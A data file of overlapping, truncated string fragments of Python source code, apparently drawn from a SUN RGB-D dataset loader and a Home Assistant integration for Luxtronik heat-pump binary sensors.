"intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self,",
"def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name",
"= path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path =",
"def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def",
"= None self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self,",
"\"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\",",
"label(self): return self._label @label.setter def label(self, label): self._label = label @property def img_name(self):",
"def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def",
"_id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat",
"np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/'",
"'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type =",
"@property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property",
"@split.setter def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter",
"\"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for",
"@sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter",
"_id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for",
"if cat == cat_name: return True return False def load_props(params, path, split): start_ind",
"= data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if",
"\"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v in",
"label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics = None",
"sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type",
"@property def path(self): return self._path @path.setter def path(self, path): self._path = path @property",
"= sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics =",
"\"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\",",
"Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self,",
"} class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values())",
"intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]),",
"class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id",
"cat in class_names: if cat == cat_name: return True return False def load_props(params,",
"Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self, K):",
"class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def",
"data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'),",
"\"18\": \"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names",
"for cat in class_names: if cat == cat_name: return True return False def",
"'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name",
"Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K = K",
"np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\":",
"= class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat",
"instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type",
"import os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = {",
"None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type",
"self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt",
"dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics =",
"= np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name =",
"'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name)",
"= os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics",
"self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K",
"== cat_name: return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD')",
"os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type",
"data_type, img_name, path, label, split): self._data_type = data_type self._path = path self._label =",
"split): self._data_type = data_type self._path = path self._label = label self._img_name = img_name",
"'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else:",
"def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def",
"sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type,",
"def get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id)",
"\"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\":",
"split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self,",
"\"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\","
] |
[
"from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType",
"Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)",
"self._attr_name = name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category",
"Final import homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK,",
"DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const",
"deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if sensors: # region",
"else value def update(self): \"\"\"Get the latest status and use it to update",
"sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id:",
"sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group",
"use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass,",
"deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class: str, state_class:",
"device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self):",
"lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo,",
"is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def",
"= hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id =",
"else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name",
"PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import",
"slugify from .const import * from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice",
"sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not",
"Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config,",
"return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating",
"ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\"",
"deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is",
"from .luxtronik_device import LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(",
"for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group =",
"discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set up a Luxtronik binary",
"luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else:",
"= self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class =",
"endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__(",
"invert_state @property def is_on(self): \"\"\"Return true if binary sensor is on.\"\"\" value =",
"[ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"]",
"= entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true if binary sensor",
"{ vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]),",
"cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) # endregion Constants #",
"self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str,",
"import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from .const import",
"import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import",
"state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id,",
"ID %s in group %s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities)",
"'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ]",
"= sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if",
"homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from",
"unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik",
"state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False )",
"LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build",
"hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if sensors: # region Legacy part:",
"import LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS):",
"= get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump',",
"LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All(",
"CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform",
"language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik,",
"config.get(CONF_SENSORS) entities = [] if sensors: # region Legacy part: for sensor_cfg in",
"value def update(self): \"\"\"Get the latest status and use it to update our",
"self._invert = invert_state @property def is_on(self): \"\"\"Return true if binary sensor is on.\"\"\"",
"[ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE))",
"part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) ->",
"AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry",
"from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not",
"ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set up",
"# endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities:",
"entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON),",
"BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME,",
"None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik",
"# region Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.'",
"= [] if sensors: # region Legacy part: for sensor_cfg in sensors: sensor_id",
"if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert",
"homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import",
"\"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s -",
") # endregion Constants # region Setup async def async_setup_platform( hass: HomeAssistant, config:",
"not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"]",
"= get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock',",
"homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util",
"sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id:",
"from homeassistant.util import slugify from .const import * from .helpers.helper import get_sensor_text from",
"\"Invalid Luxtronik ID %s in group %s\", sensor_id, group, ) # endregion Legacy",
"(CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo",
"binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else",
"self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info",
"from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity",
"hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [",
"luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False #",
"icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state",
"= [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater =",
"sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name",
"icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state:",
"from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback",
"async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] =",
"state_class self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true if",
"luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] #",
") -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik",
"a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo,",
"update(self): \"\"\"Get the latest status and use it to update our sensor state.\"\"\"",
"ENTITY_CATEGORIES = None, invert_state: bool = False ) -> None: \"\"\"Initialize a new",
"+= [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling =",
"= sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name",
"sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name))",
"self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def update(self): \"\"\"Get the latest",
"None, ) -> None: \"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\"",
"from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports # region",
"deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is",
"-> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik =",
"is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling,",
"is_on(self): \"\"\"Return true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not",
"'.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP]",
"CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform",
"CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, }",
"hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked =",
"self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state @property",
"names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities =",
"%s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik:",
"None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling',",
"# region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP):",
"} ], ) } ) # endregion Constants # region Setup async def",
"entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true if binary sensor is",
"sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor:",
"get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING)",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities +=",
"config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return",
"binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info)",
"region Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in",
"import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS)",
"import * from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports",
"async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info(",
"hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS)",
"Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self,",
"import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state",
"hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"]",
"sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info(",
"None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo,",
"new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key",
"DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class: str, state_class: str",
"config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor from",
"Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ {",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if sensors: # region Legacy",
"), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], )",
"[] if sensors: # region Legacy part: for sensor_cfg in sensors: sensor_id =",
"typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as vol from",
"# endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def",
".luxtronik_device import LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( {",
"homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import",
"dict[str, Any] = None, ) -> None: \"\"\"Set up a Luxtronik binary sensor",
"False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating =",
") -> None: \"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform",
